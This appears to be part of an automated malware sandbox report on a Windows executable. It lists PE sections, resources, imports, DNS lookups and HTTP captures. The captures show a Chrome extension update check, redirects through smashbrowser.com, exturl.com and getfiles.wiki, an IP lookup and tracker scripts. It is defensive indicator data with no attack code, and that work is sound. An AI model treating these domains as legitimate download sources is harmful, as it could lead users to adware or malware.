.edata	0xc4000	0x9a	0x200	False	0.2578125	data	1.8722228665884297	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xc5000	0x18	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xc6000	0x5d	0x200	False	0.189453125	data	1.3838943752217987	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc7000	0x4800	0x4800	False	0.3154296875	data	4.4213633965591095	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country
RT_ICON	0xc74c8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	Dutch	Netherlands
RT_ICON	0xc75f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	Dutch	Netherlands
RT_ICON	0xc7b58	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	Dutch	Netherlands
RT_ICON	0xc7e40	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	Dutch	Netherlands
RT_STRING	0xc86e8	0x360	data
RT_STRING	0xc8a48	0x260	data
RT_STRING	0xc8ca8	0x45c	data
RT_STRING	0xc9104	0x40c	data
RT_STRING	0xc9510	0x2d4	data
RT_STRING	0xc97e4	0xb8	data
RT_STRING	0xc989c	0x9c	data
RT_STRING	0xc9938	0x374	data
RT_STRING	0xc9cac	0x398	data
RT_STRING	0xca044	0x368	data
RT_STRING	0xca3ac	0x2a4	data
RT_RCDATA	0xca650	0x10	data
RT_RCDATA	0xca660	0x2c4	data
RT_RCDATA	0xca924	0x2c	data
RT_GROUP_ICON	0xca950	0x3e	data	English	United States
RT_VERSION	0xca990	0x584	data	English	United States
RT_MANIFEST	0xcaf14	0x726	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
netapi32.dll	NetWkstaGetInfo, NetApiBufferFree
advapi32.dll	RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x454060
__dbk_fcall_wrapper	2	0x40d0a0
dbkFCallWrapperAddr	1	0x4be63c

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 21, 2023 13:20:36.422619104 CET	51663	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:36.442142963 CET	53	51663	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:36.460253954 CET	51020	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:36.478131056 CET	53	51020	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:42.326489925 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:42.327356100 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:42.475146055 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:42.654464006 CET	52129	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:42.655395985 CET	57078	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:42.656925917 CET	52276	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:42.681925058 CET	53	52129	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:42.683576107 CET	53	57078	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:42.707256079 CET	53	52276	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:43.076273918 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:43.077142000 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:43.224226952 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:43.484271049 CET	51454	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:43.506365061 CET	53	51454	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:43.712038040 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:43.715971947 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:43.717248917 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:43.826438904 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:43.827306032 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:43.974343061 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:44.085860014 CET	63972	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:44.108927965 CET	53	63972	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:44.461393118 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:44.465389013 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:44.466317892 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:44.738475084 CET	49896	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:44.758316994 CET	53	49896	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:45.211560965 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:45.215498924 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:45.216453075 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:49.476042032 CET	61138	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:49.479659081 CET	56109	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:49.482430935 CET	50226	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:49.500879049 CET	53	56109	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:49.501703024 CET	53	50226	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:49.510060072 CET	53	61138	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:49.666661024 CET	52913	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:49.684366941 CET	53	52913	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:50.169275999 CET	59252	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:50.192905903 CET	53	59252	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:50.553143024 CET	62627	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:50.575396061 CET	53	62627	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:50.961472034 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:50.964600086 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:50.965611935 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:51.335217953 CET	52554	53	192.168.2.22	8.8.8.8
Mar 21, 2023 13:20:51.360663891 CET	53	52554	8.8.8.8	192.168.2.22
Mar 21, 2023 13:20:51.713797092 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:51.729381084 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:51.730082035 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:52.314461946 CET	138	138	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:52.478183031 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:52.493736029 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:20:52.496159077 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:21:23.862785101 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:21:24.612128019 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:21:25.371232033 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:21:37.202208042 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:21:37.963083982 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:21:38.727533102 CET	137	137	192.168.2.22	192.168.2.255
Mar 21, 2023 13:22:21.852103949 CET	138	138	192.168.2.22	192.168.2.255

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 21, 2023 13:20:35.924192905 CET	8.8.8.8	192.168.2.22	0xbcba	No error (0)	au.c-0001.c-msedge.net	c-0001.c-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 21, 2023 13:20:35.924192905 CET	8.8.8.8	192.168.2.22	0xbcba	No error (0)	c-0001.c-msedge.net		13.107.4.50	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:36.442142963 CET	8.8.8.8	192.168.2.22	0x527f	No error (0)	ocsps.ssl.com		100.24.223.135	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:36.442142963 CET	8.8.8.8	192.168.2.22	0x527f	No error (0)	ocsps.ssl.com		34.237.184.165	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:36.442142963 CET	8.8.8.8	192.168.2.22	0x527f	No error (0)	ocsps.ssl.com		52.6.97.148	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:36.478131056 CET	8.8.8.8	192.168.2.22	0xa2f8	No error (0)	ocsps.ssl.com		34.237.184.165	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:36.478131056 CET	8.8.8.8	192.168.2.22	0xa2f8	No error (0)	ocsps.ssl.com		100.24.223.135	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:36.478131056 CET	8.8.8.8	192.168.2.22	0xa2f8	No error (0)	ocsps.ssl.com		52.6.97.148	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:42.681925058 CET	8.8.8.8	192.168.2.22	0xb44c	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 21, 2023 13:20:42.681925058 CET	8.8.8.8	192.168.2.22	0xb44c	No error (0)	clients.l.google.com		142.250.203.110	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:42.683576107 CET	8.8.8.8	192.168.2.22	0xf68c	No error (0)	accounts.google.com		172.217.168.77	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:42.707256079 CET	8.8.8.8	192.168.2.22	0x3880	No error (0)	smashbrowser.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:42.707256079 CET	8.8.8.8	192.168.2.22	0x3880	No error (0)	smashbrowser.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:43.506365061 CET	8.8.8.8	192.168.2.22	0x790d	No error (0)	exturl.com		38.128.66.115	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:44.108927965 CET	8.8.8.8	192.168.2.22	0x1dfb	No error (0)	getfiles.wiki		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:44.108927965 CET	8.8.8.8	192.168.2.22	0x1dfb	No error (0)	getfiles.wiki		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:44.758316994 CET	8.8.8.8	192.168.2.22	0x843d	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Mar 21, 2023 13:20:44.758316994 CET	8.8.8.8	192.168.2.22	0x843d	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:44.758316994 CET	8.8.8.8	192.168.2.22	0x843d	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:44.758316994 CET	8.8.8.8	192.168.2.22	0x843d	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.500879049 CET	8.8.8.8	192.168.2.22	0x89c0	No error (0)	offerszzzz.click		38.128.66.115	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.501703024 CET	8.8.8.8	192.168.2.22	0x7210	No error (0)	s10.histats.com	s10.histats.com.web.cdn.anycast.me		CNAME (Canonical name)	IN (0x0001)	false
Mar 21, 2023 13:20:49.501703024 CET	8.8.8.8	192.168.2.22	0x7210	No error (0)	s10.histats.com.web.cdn.anycast.me	46-105-201-240.any.cdn.anycast.me		CNAME (Canonical name)	IN (0x0001)	false
Mar 21, 2023 13:20:49.501703024 CET	8.8.8.8	192.168.2.22	0x7210	No error (0)	46-105-201-240.any.cdn.anycast.me		46.105.201.240	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.510060072 CET	8.8.8.8	192.168.2.22	0x594a	No error (0)	offersss.click		38.128.66.115	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.684366941 CET	8.8.8.8	192.168.2.22	0x7a99	No error (0)	s4.histats.com		54.39.156.32	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.684366941 CET	8.8.8.8	192.168.2.22	0x7a99	No error (0)	s4.histats.com		54.39.128.162	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.684366941 CET	8.8.8.8	192.168.2.22	0x7a99	No error (0)	s4.histats.com		149.56.240.132	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.684366941 CET	8.8.8.8	192.168.2.22	0x7a99	No error (0)	s4.histats.com		149.56.240.27	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.684366941 CET	8.8.8.8	192.168.2.22	0x7a99	No error (0)	s4.histats.com		149.56.240.128	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.684366941 CET	8.8.8.8	192.168.2.22	0x7a99	No error (0)	s4.histats.com		149.56.240.129	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.684366941 CET	8.8.8.8	192.168.2.22	0x7a99	No error (0)	s4.histats.com		149.56.240.31	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.684366941 CET	8.8.8.8	192.168.2.22	0x7a99	No error (0)	s4.histats.com		149.56.240.127	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.684366941 CET	8.8.8.8	192.168.2.22	0x7a99	No error (0)	s4.histats.com		54.39.128.117	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.684366941 CET	8.8.8.8	192.168.2.22	0x7a99	No error (0)	s4.histats.com		149.56.240.131	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:49.684366941 CET	8.8.8.8	192.168.2.22	0x7a99	No error (0)	s4.histats.com		149.56.240.130	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:50.192905903 CET	8.8.8.8	192.168.2.22	0x42c3	No error (0)	e.dtscout.com		141.101.120.11	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:50.192905903 CET	8.8.8.8	192.168.2.22	0x42c3	No error (0)	e.dtscout.com		141.101.120.10	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:50.575396061 CET	8.8.8.8	192.168.2.22	0x5fc2	No error (0)	t.dtscout.com		141.101.120.11	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:50.575396061 CET	8.8.8.8	192.168.2.22	0x5fc2	No error (0)	t.dtscout.com		141.101.120.10	A (IP address)	IN (0x0001)	false
Mar 21, 2023 13:20:51.360663891 CET	8.8.8.8	192.168.2.22	0x7b52	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:43 UTC	0	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm X-Goog-Update-Updater: chromecrx-84.0.4147.135 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:43 UTC	1	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-28WSmu0jBMVKKZL2DSgTRQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 21 Mar 2023 12:20:43 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 5923 X-Daystart: 19243 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-03-21 12:20:43 UTC	2	IN	Data Raw: 33 31 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 39 32 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 31 39 32 34 33 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 Data Ascii: 31a<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5923" elapsed_seconds="19243"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2023-03-21 12:20:43 UTC	3	IN	Data Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 70 6b 65 64 63 6a 6b 64 65 66 67 70 64 65 6c 70 62 63 6d 62 6d 65 6f 6d 63 6a 62 65 65 6d 66 6d 22 20 73 74 61 74 75 73 3d 22 65 72 72 6f 72 2d 75 6e 6b 6e 6f 77 6e Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><app appid="pkedcjkdefgpdelpbcmbmeomcjbeemfm" status="error-unknown
2023-03-21 12:20:43 UTC	3	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:43 UTC	0	OUT	GET /welcome2.php HTTP/1.1 Host: smashbrowser.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:43 UTC	5	IN	HTTP/1.1 302 Found Date: Tue, 21 Mar 2023 12:20:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close location: https://exturl.com/r.php?key=pvwarw3 cache-control: no-cache, no-store, must-revalidate, max-age=0 vary: User-Agent x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rl8ZcxHYjX2lrFWC3wXCZ6xKJDSP4pg3%2FIz0Qx2FGh%2B93lxqVlpKoOT9t1ufMYlpjyCA0Ysq9ai%2BrsbC60O7tZ%2FW%2BnhmEYIBzUgr877%2F177dQTpzB751appC8WkaJyr8gMcB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7ab6268988586927-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-21 12:20:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:50 UTC	26	OUT	GET /stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1679430047893&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:197652976&@b3:1679430048&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&@w HTTP/1.1 Host: s4.histats.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:50 UTC	27	IN	HTTP/1.1 200 OK Date: Tue, 21 Mar 2023 12:20:50 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 380 Connection: close
2023-03-21 12:20:50 UTC	27	IN	Data Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 23 33 56 69 73 2e 20 74 6f 64 61 79 3d 31 31 30 33 22 3b 63 68 66 68 32 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 Data Ascii: _HST_cntval="#3Vis. today=1103";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="as

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:50 UTC	28	OUT	GET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php HTTP/1.1 Host: e.dtscout.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:50 UTC	29	IN	HTTP/1.1 200 OK Date: Tue, 21 Mar 2023 12:20:50 GMT Content-Type: application/javascript Transfer-Encoding: chunked Connection: close X-S: mtl3 Set-Cookie: m=1; Domain=dtscout.com; Expires=Tue, 21-Mar-2023 13:44:10 GMT; Max-Age=5000; Path=/; SameSite=None; Secure Set-Cookie: oa=1; Domain=dtscout.com; Expires=Tue, 21-Mar-2023 16:20:50 GMT; Max-Age=14400; Path=/; SameSite=None; Secure Set-Cookie: df=1679401250; Domain=dtscout.com; Expires=Thu, 29-Jun-2023 12:20:50 GMT; Max-Age=8640000; Path=/; SameSite=None; Secure X-T: 0.525 Expires: Tue, 21 Mar 2023 12:20:49 GMT Cache-Control: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EC6xKFcDzHV8mWxbbIryragTPLA3Ej3YzEPm%2Fuol427hZfZewpQn14OfY3PKkiGVDK1J%2B28q486pP4RcLlNvWUIf5XYd1Tnkq0VTjYXCaoQgpJpy8bteom0uZSIEzfI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7ab626b668ae9060-FRA
